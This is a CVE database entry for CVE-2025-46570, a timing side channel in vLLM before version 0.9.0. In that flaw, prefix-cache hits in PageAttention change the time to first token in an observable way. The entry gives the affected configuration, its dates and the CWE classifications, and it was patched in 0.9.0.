CVE-2025-46570

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
Configurations

Configuration 1 (hide)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*

History

24 Jun 2025, 18:25

Type Values Removed Values Added
New CVE

Information

Published : 2025-05-29 17:15

Updated : 2025-06-24 18:25


NVD link : CVE-2025-46570

Mitre link : CVE-2025-46570

CVE.ORG link : CVE-2025-46570


JSON object : View

Products Affected

vllm

  • vllm
CWE
CWE-208

Observable Timing Discrepancy

CWE-203

Observable Discrepancy